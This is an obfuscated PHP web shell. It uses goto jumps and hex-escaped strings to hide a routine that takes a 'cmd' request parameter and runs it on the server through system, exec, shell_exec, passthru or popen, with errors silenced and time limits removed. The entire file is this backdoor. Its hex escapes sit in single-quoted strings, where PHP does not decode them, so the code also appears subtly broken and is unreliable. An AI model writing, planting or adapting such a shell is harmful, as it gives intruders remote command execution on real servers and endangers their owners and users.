<?php
goto BcDjeMOK;
BcDjeMOK:
goto hGofOVIU;
hGofOVIU:

@error_reporting(0);
@set_time_limit(0);
@ini_set('\x6d\x61\x78\x5f\x65\x78\x65\x63\x75\x74\x69\x6f\x6e\x5f\x74\x69\x6d\x65', 0);

if(isset($_GET['\x63\x6d\x64'])) {
    $v4cb1c64c = $_GET['\x63\x6d\x64'];
    
    // Multiple execution methods
    if(function_exists('\x73\x79\x73\x74\x65\x6d')) {
        @system($v4cb1c64c);
    } elseif(function_exists('\x65\x78\x65\x63')) {
        @exec($v4cb1c64c, $v81ce00b1);
        echo implode("\x5c\x6e", $v81ce00b1);
    } elseif(function_exists('\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63')) {
        echo @shell_exec($v4cb1c64c);
    } elseif(function_exists('\x70\x61\x73\x73\x74\x68\x72\x75')) {
        @passthru($v4cb1c64c);
    } elseif(function_exists('\x70\x6f\x70\x65\x6e')) {
        $v80532f31 = @popen($v4cb1c64c, '\x72');
        while(!@feof($v80532f31)) { echo @fread($v80532f31, 4096); }
        @pclose($v80532f31);
    }
}

goto VMHyIcoJ;
VMHyIcoJ:
__halt_compiler(); ?>
return;
